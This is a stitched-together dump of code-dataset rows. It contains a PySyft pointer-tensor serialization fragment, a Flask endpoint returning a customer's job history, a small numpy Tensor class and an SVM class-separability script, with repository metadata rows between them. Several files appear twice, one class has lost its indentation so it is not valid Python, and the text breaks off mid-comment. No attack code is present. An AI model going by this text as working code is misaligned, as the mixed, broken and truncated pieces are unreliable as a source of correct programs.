            return syft_command['self']

        # Perform the un-wrap
        response, _ = torch_utils.get_child_command(response)

        return response

    def __str__(self):
        return "[" + type(self).__name__ + " - id:" + str(self.id) + " owner:" + str(
            self.owner.id) + " loc:" + str(self.location.id) + " id@loc:" + str(
            self.id_at_location) + "]"

    def ser(self, private, as_dict=True):
        # A pointer serializes only addressing info; the data stays remote.
        data = {
            'owner': self.owner.id,
            'id': self.id,
            'location': self.location.id,
            'id_at_location': self.id_at_location,
            'torch_type': self.torch_type
        }
        if as_dict:
            return {'___PointerTensor__': data}
        else:
            return json.dumps({'___PointerTensor__': data}) + "\n"

    @classmethod
    def deser(cls, msg_obj, worker, acquire):
        # If local, we render the object or syft object
        if msg_obj['location'] == worker.id:
            syft_obj = worker.get_obj(msg_obj['id_at_location'])
        else:
            if acquire:  # If there is data transmission, data being here Pointer
                # We acquire the tensor pointer
                previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
                if previous_pointer is None:
                    syft_obj = cls(child=None,
                                   parent=None,
                                   torch_type=msg_obj['torch_type'],
                                   location=msg_obj['location'],
                                   id_at_location=msg_obj['id_at_location'],
                                   owner=worker,
                                   id=msg_obj['id'],
                                   skip_register=True)
                else:
                    syft_obj = previous_pointer
            else:  # We point at the Pointer (same part as every syft tensors)
                previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
                if previous_pointer is None:
                    syft_obj = sy._PointerTensor(child=None,
                                                 parent=None,
                                                 torch_type=msg_obj['torch_type'],
                                                 location=msg_obj['owner'],
                                                 id_at_location=msg_obj['id'],
                                                 owner=worker,
                                                 id=None,
                                                 skip_register=True)
                else:
                    syft_obj = previous_pointer
        return syft_obj

    def get(self, deregister_ptr=True):
        """
        Get back from a remote worker the chain this pointer is pointing at
        """
        # Remove this pointer
        if deregister_ptr:
            if self.torch_type == 'syft.Variable':
                self.owner.rm_obj(self.parent.data.child.id)
            self.owner.rm_obj(self.id)

        # if the pointer happens to be pointing to a local object,
        # just return that object (this is an edge case)
        if self.location == self.owner:
            return self.owner.get_obj(self.id_at_location).child

        # get SyftTensor (Local or Pointer) from remote machine
        tensorvar = self.owner.request_obj(self.id_at_location, self.location)
        torch_utils.assert_has_only_torch_tensorvars(tensorvar)

        # Keep the local ids so the fetched chain replaces this pointer in place.
        syft_tensor = tensorvar.child
        syft_tensor.id = self.id
        if self.torch_type == 'syft.Variable':
            tensorvar.data.child.id = self.parent.data.child.id

        # Register the result
        self.owner.register(syft_tensor)
        if syft_tensor.torch_type == 'syft.Variable':
            self.owner.register(tensorvar.data.child)

        torch_utils.fix_chain_ends(tensorvar)

        return tensorvar
class _FixedPrecisionTensor(_SyftTensor):
    # Placeholder for fixed-precision arithmetic support; currently it only
    # forwards construction to _SyftTensor.

    def __init__(self, child, parent, torch_type, owner=None):
        super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner)
class _TorchObject(object):
"""
This tensor is simply a more convenient way to add custom
functions to all Torch tensor types, including Torch Variable.
Note that it is the parent class of the two following classes:
_TorchTensor and a_TorchVariable
"""
__module__ = 'syft'
def set_id(self, new_id):
self.child.set_id(new_id)
return self
def __str__(self):
return self.native___str__()
def __repr__(self):
if torch_utils.is_tensor(self) and hasattr(self, 'child') and not isinstance(self.child, (
sy._LocalTensor, sy._PointerTensor)):
x_ = type(self)()
x_.native_set_(self)
return "[Head of chain]\n" + x_.native___repr__()
if torch_utils.is_variable(self) and hasattr(self, 'child') and not isinstance(self.child, (
sy._LocalTensor, sy._PointerTensor)):
x_ = type(self)(self.data)
x_.native_set_(self)
return "[Head of chain]\n" + x_.native___repr__()
return self.native___repr__()
def create_pointer(self, register=False, location=None, ptr_id=None):
return self.child.create_pointer(parent=self, register=register, location=location,
ptr_id=ptr_id).wrap()
def move(self, worker, new_id=None):
"""
Give the end leaf of the chain to worker,
just like if the last elmt was send its child
to worker
self->alice->obj [worker] => self->alice->worker->obj
"""
raise NotImplementedError('Move is not supported anymore.')
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if new_id is None:
new_id = random.randint(0, 10e10)
if isinstance(self.child, sy._PointerTensor):
pointer = self.child
else:
pointer = None
if pointer is None:
return self.send(worker, new_id)
command, _ = pointer.compile_command('move',
(worker.id, new_id),
{},
True)
response = pointer.owner.send_torch_command(recipient=pointer.location,
message=command)
return self
class _TorchTensor(_TorchObject):
    """
    Torch-tensor-side wrapper: serialization, send/get and display helpers
    for the syft chain hanging under a native torch tensor.
    """

    def __str__(self):
        if isinstance(self.child, _PointerTensor):
            return type(self).__name__ + self.child.__str__() + ""
        elif isinstance(self.child, _LocalTensor) and torch_utils.is_tensor_empty(self):
            if (hasattr(self.child, 'child')):
                return self.child.child.native___str__()
            else:
                return "Empty Wrapper:\n" + self.native___str__()
        else:
            # Custom syft head: display through a native copy with a marker.
            if not isinstance(self.child, (sy._LocalTensor, sy._PointerTensor)):
                x_ = type(self)()
                x_.native_set_(self)
                return "[Head of chain]\n" + x_.native___repr__()
            return self.native___str__()

    def ser(self, private, as_dict=True):
        # private=True omits the actual values (only metadata is sent).
        key = '__' + type(self).__name__ + '__'
        data = self.tolist() if not private else []
        tensor_msg = {
            'type': str(self.__class__).split("'")[1],
            'torch_type': 'syft.' + type(self).__name__,
            'data': data,
            'child': self.child.ser(private)
        }
        if as_dict:
            return {key: tensor_msg}
        else:
            return json.dumps({key: tensor_msg}) + "\n"

    @staticmethod
    def deser(msg_obj, worker, acquire):
        obj_type, msg_obj = torch_utils.extract_type_and_obj(msg_obj)
        syft_obj = sy._SyftTensor.deser_routing(msg_obj['child'], worker, acquire)

        # If we have retrieved an already existing object (TODO: add checks) then return it
        if syft_obj.parent is not None and syft_obj.child is not None:
            return syft_obj.parent

        tensorvar = torch.guard['syft.' + obj_type](msg_obj['data'])
        torch_utils.wrap_command_with(syft_obj, tensorvar)

        # TODO: Find a smart way to skip register and not leaking the info to the local worker
        # This would imply overload differently the __init__ to provide an owner for the child attr.
        worker.hook.local_worker.de_register(tensorvar)

        # Ensure that the loop is made, if needed
        if isinstance(torch_utils.find_tail_of_chain(tensorvar), sy._LocalTensor):
            torch_utils.fix_chain_ends(tensorvar)

        return tensorvar

    def send(self, worker, ptr_id=None):
        """
        Give the root of the chain held by self to worker
        self->alice->obj [worker] => self->worker->alice->obj

        Args:
            worker: the recipient of the transfer
            ptr_id: the id of the object when sent:
                x.send(bob, 1000)
                will result in bob having the tensor x with id 1000
        """
        if isinstance(worker, (int, str)):
            worker = self.owner.get_worker(worker)

        if ptr_id is None:
            ptr_id = random.randint(0, 10e10)

        obj_id = self.child.id

        # creates a pointer to LocalTensor without a Torch object wrapping it because
        # we're going to set self.child to be this pointer.
        # we set register=True because we want it to be registered locally
        self.owner.send_obj(self, ptr_id, worker)

        # clears data which could be cached in the wrapper (which is self)
        # which would be confusing for folks
        self.native_set_()

        # set this wrapper's child to be the newly created PointerTensor
        self.child.id = obj_id
        syft_pointer = self.child.create_pointer(location=worker, id_at_location=ptr_id, register=True)
        torch_utils.wrap_command_with(syft_pointer, self)
        self.parent = None

        return self

    def get(self, deregister_ptr=True, update_ptr_wrapper=True):
        """
        Get a remote tensor back to the local worker.
        :param deregister_ptr: should we de-register from the remote. Default to True
        :param update_ptr_wrapper: If true, by default, change the pointer variable (wrapper)
        to instead wrap the SyftTensor object that was returned so that any variable that may
        still exist referencing this pointer will simply call local data instead of sending
        messages elsewhere, or a closer pointer
        :return: self
        """
        # returns a Tensor object wrapping a SyftTensor
        tensor = self.child.get(deregister_ptr=deregister_ptr)
        torch_utils.assert_has_only_torch_tensorvars(tensor)
        # this will change the pointer variable (wrapper) to instead wrap the
        # SyftTensor object that was returned so that any variable that may
        # still exist referencing this pointer will simply call local data instead
        # of sending messages elsewhere, or a closer pointer
        if update_ptr_wrapper:
            syft_tensor = tensor.child
            self.child = syft_tensor
            # In case we have a final get() (ie returning a FloatTensor), we have e.g.
            # x = Float(...)
            # x.send(...)
            # x2 = x.get()
            # We have x2: [no dim]->[_Local]->[Float()]
            # Whereas we expect x2: [Float()]
            # So we use the .set_() method, to change the storage of [no dim]
            if not isinstance(syft_tensor, sy._PointerTensor) \
                    and tensor is not None \
                    and tensor.dim() > 0:
                self.native_set_(tensor)
            torch_utils.fix_chain_ends(self)
            torch_utils.assert_is_chain_well_formed(self)

        return self
class _TorchVariable(_TorchObject):
    """
    Variable-side wrapper. A Variable carries four linked chains
    (var, var.data, var.grad, var.grad.data), so send/get/ser/deser must
    keep all of them consistent.
    """

    def send(self, worker, new_id=None, new_data_id=None, new_grad_id=None, new_grad_data_id=None):
        """
        Give the root of the chain held by self to worker
        self->alice->obj [worker] => self->worker->alice->obj
        Because there are Variable involved, there are actually 4 chains involved,
        the variable chain, variable.data, variable.grad, variable.grad.data
        """
        if isinstance(worker, (int, str)):
            worker = self.owner.get_worker(worker)

        # Init new remote ids if needed
        (new_id, new_data_id, new_grad_id, new_grad_data_id) = utils.map_tuple(
            None,
            (new_id, new_data_id, new_grad_id, new_grad_data_id),
            lambda id: id if id is not None else random.randint(0, 10e10))

        # Store tensorvar ids
        obj_id = self.child.id
        obj_data_id = self.data.child.id
        obj_grad_id = self.grad.child.id if self.grad is not None else None
        obj_grad_data_id = self.grad.data.child.id if self.grad is not None else None

        self.owner.send_obj(self,
                            new_id,
                            worker,
                            new_data_id=new_data_id,
                            new_grad_id=new_grad_id,
                            new_grad_data_id=new_grad_data_id)

        # Clear data which could be cached in the wrapper (which is self)
        utils.map_tuple(None, (self, self.data, self.grad, self.grad.data), lambda x: x.native_set_())

        # For all the objects, create a pointer and insert it as a direct child
        for id, remote_id, wrapper in zip(
                [obj_id, obj_data_id, obj_grad_id, obj_grad_data_id],
                [new_id, new_data_id, new_grad_id, new_grad_data_id],
                [self, self.data, self.grad, self.grad.data]):
            wrapper.child.id = id
            pointer = wrapper.child.create_pointer(location=worker, id_at_location=remote_id, register=True)
            torch_utils.wrap_command_with(pointer, wrapper)
            wrapper.parent = None

        torch_utils.link_var_chain_to_data_and_grad_chains(self, self.data, self.grad)

        return self

    def get(self, deregister_ptr=True, update_ptr_wrapper=True):
        """
        Get a remote variable back to the local worker.
        :param deregister_ptr: should we de-register from the remote. Default to True
        :param update_ptr_wrapper: If true, by default, change the pointer variable (wrapper)
        to instead wrap the SyftTensor object that was returned so that any variable that may
        still exist referencing this pointer will simply call local data instead of sending
        messages elsewhere, or a closer pointer
        :return: self
        """
        # returns a Variable object wrapping a SyftTensor
        variable = self.child.get(deregister_ptr=deregister_ptr)
        torch_utils.assert_has_only_torch_tensorvars(variable)
        # this will change the wrapper variable to instead wrap the
        # SyftTensor object that was returned so that any variable that may
        # still exist referencing this pointer will simply call local data instead
        # of sending messages elsewhere, or a closer pointer
        if update_ptr_wrapper:
            self.child = variable.child
            self.data.child = variable.data.child
            if self.grad is not None and variable.grad is not None:
                self.grad.child = variable.grad.child

            # In case we have a final get() (ie returning a FloatTensor), we have e.g.
            # x = Float(...)
            # x.send(...)
            # x2 = x.get()
            # We have x2: [no dim]->[_Local]->[Float()]
            # Whereas we expect x2: [Float()]
            # So we use the .set_() method, to change the storage of [no dim]
            if not isinstance(variable.child, sy._PointerTensor) \
                    and variable.data is not None \
                    and variable.data.dim() > 0:
                self.native_set_(variable)
                if self.grad is not None and variable.grad is not None:
                    self.grad.data = variable.grad.data

            # Relink the 4 chains so the wrapper is well formed again.
            if self.grad is not None:
                torch_utils.link_var_chain_to_data_and_grad_chains(self, self.data, self.grad)
            else:
                torch_utils.link_var_chain_to_data_chain(self, self.data)

            torch_utils.fix_chain_ends(self)
            torch_utils.assert_is_chain_well_formed(self)

        return self

    def ser(self, private, as_dict=True):
        key = '__' + type(self).__name__ + '__'
        tensor_msg = {
            'type': str(self.__class__).split("'")[1],
            'torch_type': 'syft.' + type(self).__name__,
            'data': self.data.ser(private),
            'child': self.child.ser(private),
            'requires_grad': self.requires_grad
        }
        if self.grad is not None:
            tensor_msg['grad'] = self.grad.ser(private)
        elif self.data.dim() > 0:
            # Create a .grad just if there is some data in the tensor (to avoid recursion errors)
            self.init_grad_()
            tensor_msg['grad'] = self.grad.ser(private)
        if as_dict:
            return {key: tensor_msg}
        else:
            return json.dumps({key: tensor_msg}) + "\n"

    @staticmethod
    def deser(msg_obj, worker, acquire):
        obj_type, msg_obj = torch_utils.extract_type_and_obj(msg_obj)
        var_syft_obj = sy._SyftTensor.deser_routing(msg_obj['child'], worker, acquire)

        # Already-known object: reuse it instead of rebuilding the chain.
        if var_syft_obj.parent is not None and var_syft_obj.child is not None:
            return var_syft_obj.parent

        # Deser the var.data
        var_data_type, var_data_tensor = torch_utils.extract_type_and_obj(msg_obj['data'])
        if torch_utils.is_tensor(var_data_type):
            var_data = torch.guard['syft.' + var_data_type].deser(msg_obj['data'], worker, acquire)
            worker.hook.local_worker.de_register(var_data)
        else:
            raise TypeError('Data is not a tensor:', var_data_type)

        variable = sy.Variable(var_data, requires_grad=msg_obj['requires_grad'])

        # Deser the var.grad
        if 'grad' in msg_obj:
            var_grad_type, var_grad_tensor = torch_utils.extract_type_and_obj(msg_obj['grad'])
            var_grad = torch.guard['syft.' + var_grad_type].deser(msg_obj['grad'], worker, acquire)
            worker.hook.local_worker.de_register(var_grad)
            variable.assign_grad_(var_grad)
        else:
            var_grad = None

        # TODO: Find a smart way to skip register and not leaking the info to the local worker
        # This would imply overload differently the __init__ to provide an owner for the child attr.
        worker.hook.local_worker.de_register(variable)
        worker.hook.local_worker.de_register(variable.data)
        if variable.grad is not None:
            worker.hook.local_worker.de_register(variable.grad)
            worker.hook.local_worker.de_register(variable.grad.data)

        variable.child = var_syft_obj
        var_syft_obj.parent = variable

        # Re-assign the data, and propagate deeply
        if var_grad is None:
            torch_utils.link_var_chain_to_data_chain(variable, var_data)
        else:
            torch_utils.link_var_chain_to_data_and_grad_chains(variable, var_data, var_grad)

        return variable

    def init_grad_(self):
        """
        Initialise grad as an empty tensor
        """
        self.grad = sy.Variable(sy.zeros(self.size()).type(type(self.data)))
        self.grad.native_set_()
        self.grad.child.owner = self.owner
        self.grad.data.child.owner = self.owner

    def assign_grad_(self, var_grad):
        """
        Assign to self.grad any type of variable
        """
        # save the var_grad.data
        var_grad_data = var_grad.data

        # Transform var_grad into an envelope compatible with .grad assignment
        if self.size() != var_grad.size():
            var_grad.data = sy.zeros(self.data.size())
        var_grad.data = var_grad.data.type(type(self.data))

        self.grad = var_grad

        # put back original var_grad.data
        self.grad.data = var_grad_data
| 15,325 | 16,499 | 524 |
cc9dd8cf46ccc1eb841121a757ce978bd638c1e7 | 2,209 | py | Python | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | null | null | null | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | 1 | 2021-09-18T05:56:45.000Z | 2021-09-18T05:56:45.000Z | backend/src/jobs/flaskGetSpecJobHistory.py | frost917/customer-manager | d7d4c16f99e1548989bff85c20c307a844711eda | [
"Apache-2.0"
] | null | null | null | from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
# Load every treatment (job) record for a specific customer
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
| 35.063492 | 124 | 0.67904 | from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
# Load every treatment (job) record for a specific customer
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
def getJobHistory(customerID):
    """Return every treatment (job) record for one customer as a JSON response.

    Responds 404 if the customer is unknown and 500 if the database
    queries fail; otherwise 200 with customer info plus the job list.
    """
    database = PostgresControll()

    customerData = database.getCustomerData(customerID=customerID)
    if len(customerData) == 0:
        from msg.jsonMsg import customerNotFound
        return Response(customerNotFound(customerID=customerID), status=404, content_type="application/json; charset=UTF-8")

    jobData = database.getJobsFromCustomerID(customerID=customerID)
    if jobData is None:
        from msg.jsonMsg import databaseIsGone
        return Response(databaseIsGone(), status=500, content_type="application/json; charset=UTF-8")

    payload = dict()
    jobs = list()
    for job in jobData:
        temp = dict()
        jobID = job.get('job_id')
        temp['jobID'] = jobID

        jobFinished = database.getJobFinishedArray(jobID=jobID)
        if jobFinished is None:
            from msg.jsonMsg import databaseIsGone
            return Response(databaseIsGone(), status=500, content_type="application/json; charset=UTF-8")

        # The rows come back as ReadDictRow objects, so convert them to a plain dict
        array = dict()
        for finished in jobFinished:
            array[finished.get('type_id')] = finished.get('job_name')
        temp['jobFinished'] = array

        temp['visitDate'] = job.get('visit_date').strftime('%Y-%m-%d')
        # Treat a missing price as zero.
        if job.get('job_price') is None:
            temp['jobPrice'] = 0
        else:
            temp['jobPrice'] = int(job.get('job_price'))
        temp['jobDescription'] = job.get('job_description')
        jobs.append(temp)

    temp = dict()
    temp['customerID'] = customerID
    temp['customerName'] = customerData.get('customer_name')
    temp['phoneNumber'] = customerData.get('phone_number')
    payload['customerData'] = temp
    payload['jobData'] = jobs
    return Response(json.dumps(payload), status=200, content_type="application/json; charset=UTF-8")
| 1,851 | 0 | 22 |
29300bf9bee9f68f012ef9344b1eeab4fad8bcc6 | 1,759 | py | Python | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | 13 | 2018-04-20T09:52:24.000Z | 2021-02-16T22:46:25.000Z | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | null | null | null | pytensor/network/tensor.py | xinjli/pyml | 03cc30c75014f97655410e6b481b429523dfd045 | [
"MIT"
] | 5 | 2019-02-18T12:51:29.000Z | 2022-03-06T15:08:53.000Z | import numpy as np
class LongTensor:
    """
    Integer-valued tensor wrapper.

    A LongTensor stores its payload as a 32-bit integer numpy array and,
    unlike Tensor, carries no gradient buffer.
    """

    def __init__(self, value, name='LongTensor', trainable=False):
        """
        Build an integer tensor.

        :param value: array-like of integers to store
        :param name: label attached to this tensor
        :param trainable: accepted for interface parity; integer tensors
            are never trained
        """
        self.name = name
        # Coerce whatever was given into an int32 numpy array.
        self.value = np.array(value, dtype=np.int32)
class Tensor:
    """
    Basic value holder for nodes of the computation graph.

    Keeps a forward value together with a gradient buffer used during
    back-propagation.
    """

    def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
        """
        :param value: numpy array, or plain list converted with ``dtype``
        :param name: label used when registering this tensor as a parameter
        :param dtype: dtype applied when converting a list input
        :param trainable: whether optimizers may update this tensor
        :param grad: optional pre-allocated gradient buffer
        """
        # Lists are converted; anything else (e.g. an ndarray) is stored as-is.
        self.value = np.array(value, dtype=dtype) if isinstance(value, list) else value

        # Default gradient is a float32 zero buffer shaped like the value.
        self.grad = grad if grad is not None else np.zeros(self.value.shape, dtype=np.float32)

        # Name used for parameter registration.
        self.name = name

        # Whether this tensor can be updated during training.
        self.trainable = trainable
| 25.128571 | 112 | 0.590677 | import numpy as np
class LongTensor:
    """
    LongTensor is a type of Tensor to keep integers
    """

    def __init__(self, value, name='LongTensor', trainable=False):
        """
        :param value: long value
        :param name:
        :param trainable:
        """
        # Stored as an int32 numpy array; no gradient buffer is kept.
        self.value = np.array(value, dtype=np.int32)
        self.name = name

    def clear_grad(self):
        # Integer tensors carry no gradient; no-op kept for interface
        # parity with Tensor.
        return

    def reshape(self, array):
        # No-op placeholder matching Tensor's interface — presumably
        # intentional since there is no grad to keep in sync; TODO confirm.
        return
class Tensor:
    """
    Tensor is the basic structure in the computation graph
    It holds value for forward computation and grad for backward propagation
    """

    def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
        """
        :param value: numpy val
        :param name: name for the Tensor
        :param trainable: whether the Tensor can be trained or not
        """
        # value for forward computation
        if isinstance(value, list):
            self.value = np.array(value, dtype=dtype)
        else:
            self.value = value

        # value for backward computation
        if grad is not None:
            self.grad = grad
        else:
            self.grad = np.zeros(self.value.shape, dtype=np.float32)

        # name for the Tensor (which will used in parameter for registration)
        self.name = name

        # whether the Tensor can be updated
        self.trainable = trainable

    def __str__(self):
        return "Tensor {name: "+self.name+"}\n- value : "+str(self.value)+"\n- gradient : "+str(self.grad)+""

    def __repr__(self):
        return self.__str__()

    def clear_grad(self):
        """Reset the gradient buffer to zeros in place."""
        self.grad.fill(0.0)

    def reshape(self, array):
        """Reshape both value and grad to the given shape.

        Bug fix: ``ndarray.reshape`` returns a new view and does NOT modify
        the array in place, so the results must be assigned back; previously
        the return values were discarded and this method silently did nothing.
        """
        self.value = self.value.reshape(array)
        self.grad = self.grad.reshape(array)
| 271 | 0 | 162 |
ecbd1a9534534abe593e2f4947ba9fa64382adf4 | 12,996 | py | Python | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | SVM/svm.py | Younes-SadatNejad/SIP_Temp | d38f4255283a2fb6f2bdc2c7d8a27e9462bd9727 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
    """
    Scale the input vector to unit length.

    Parameters
    ----------
    vector : numpy array
        The input vector.

    Returns
    -------
    TYPE : numpy array
        ``vector`` divided by its Euclidean norm.
    """
    norm = np.linalg.norm(vector)
    return vector / norm
def angle_between(v1, v2):
    """
    Calculate the angle between two vectors, in radians.

    Parameters
    ----------
    v1 : numpy array
        vector 1.
    v2 : numpy array
        vector 2.

    Returns
    -------
    TYPE :
        Angle in [0, pi]; the cosine is clipped to [-1, 1] to absorb
        floating-point round-off before arccos.
    """
    cosine = np.dot(unit_vector(v1), unit_vector(v2))
    return np.arccos(np.clip(cosine, -1.0, 1.0))
def projection_on_line(c_center_1, c_center_2, original_data):
    """
    Project a data point onto the line through both cluster centers.

    Parameters
    ----------
    c_center_1 : numpy 1 by 2 array
        first center coordinates.
    c_center_2 : numpy 1 by 2 array
        second center coordinates.
    original_data : numpy n by 2 array
        data points.

    Returns
    -------
    numpy array
        Coordinates of the point projected onto the line connecting the
        two centers.
    """
    axis = c_center_1 - c_center_2
    offset = original_data - c_center_1
    # Scalar projection of the offset onto the center-to-center axis.
    scale = np.dot(offset, axis) / np.dot(axis, axis)
    return c_center_1 + scale * axis
def calculate_center(original_data):
    """
    Calculate the centroid of the data points.

    Parameters
    ----------
    original_data : numpy array
        The data points, one sample per row.

    Returns
    -------
    center_co : numpy array
        The coordinates of the center point (column-wise mean).
    """
    return np.sum(original_data, axis=0) / original_data.shape[0]
def calculate_pvar(pdata):
    """
    Variance of points already projected onto a line.

    Each point is assigned a signed distance from the centroid; the sign is
    taken relative to the offset direction of the point at index 1, so the
    input must hold at least two points and no point should coincide with
    the centroid (a zero offset makes unit_vector divide by zero).

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        the variance of the signed distances along the line.
    """
    centroid = calculate_center(pdata)
    offsets = pdata - np.full(pdata.shape, centroid)
    # Reference direction fixing the sign convention (point at index 1).
    reference = unit_vector(offsets[1, :])
    signed_dists = []
    for row in range(pdata.shape[0]):
        orientation = np.dot(reference, unit_vector(offsets[row, :]))
        signed_dists.append(np.sign(orientation) * np.linalg.norm(offsets[row, :]))
    return np.var(np.array(signed_dists))
def calculate_dvar(pdata):
    """
    Mean squared distance of the points from their centroid.

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        the average of the squared centroid distances.
    """
    centroid = calculate_center(pdata)
    offsets = pdata - np.full(pdata.shape, centroid)
    squared = np.power(np.linalg.norm(offsets, axis=1), 2)
    return np.sum(squared) / pdata.shape[0]
def rotate_data(X_data, y):
    """
    Rotate the points so the line through the two class centers becomes
    horizontal (which simplifies the variance calculation downstream).

    Parameters
    ----------
    X_data : numpy array
        The data points to rotate, one sample per row.
    y : numpy array
        Labels (+1 / -1) for X_data.

    Returns
    -------
    X_rotated : numpy array
        Rotated numpy array.
    """
    center_p = calculate_center(X_data[y == 1])
    center_n = calculate_center(X_data[y == -1])
    # Angle of the center-to-center segment; rotate by its negative so the
    # segment lands on the x axis.
    slope = (center_p[1] - center_n[1]) / (center_p[0] - center_n[0])
    theta = -math.atan(slope)
    cos_t, sin_t = np.cos(theta), np.sin(theta)
    rotation_mat = np.array(((cos_t, -sin_t), (sin_t, cos_t)))
    rotated = [rotation_mat.dot(point) for point in X_data]
    return np.array(rotated)
# %% Generating the data
# Two Gaussian blobs (2000 points each); labels are remapped to {+1, -1}.
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
                  centers=centers,
                  cluster_std=clusters_std,
                  random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
# NOTE(review): scaling is disabled — 'scaler' is created but never used.
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calculate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which goes through the centers
X_pro = []
for i in range(X_s.shape[0]):
    projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
                                        X_s[i])
    X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
# Pooled (sample-size weighted) variance of the two projected clusters.
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
             (X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
                                                  X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
# Separability score in dB: center distance relative to the 6-sigma spread.
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and central points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
           color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
           color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going through two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottom x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
           color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottom x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
           color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approach
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
        'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
    # NOTE(review): random_state=1 makes every "iteration" use the same
    # split, so the 9 passes produce identical rows — confirm intended.
    X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
                                                        random_state=1)
    # NOTE(review): 'i = i' is a no-op (here and inside the inner loop).
    i = i
    Cs = np.logspace(-1, 2, 1000).tolist()
    Cs = np.array(Cs)
    # NOTE(review): C receives the whole array here; this only works because
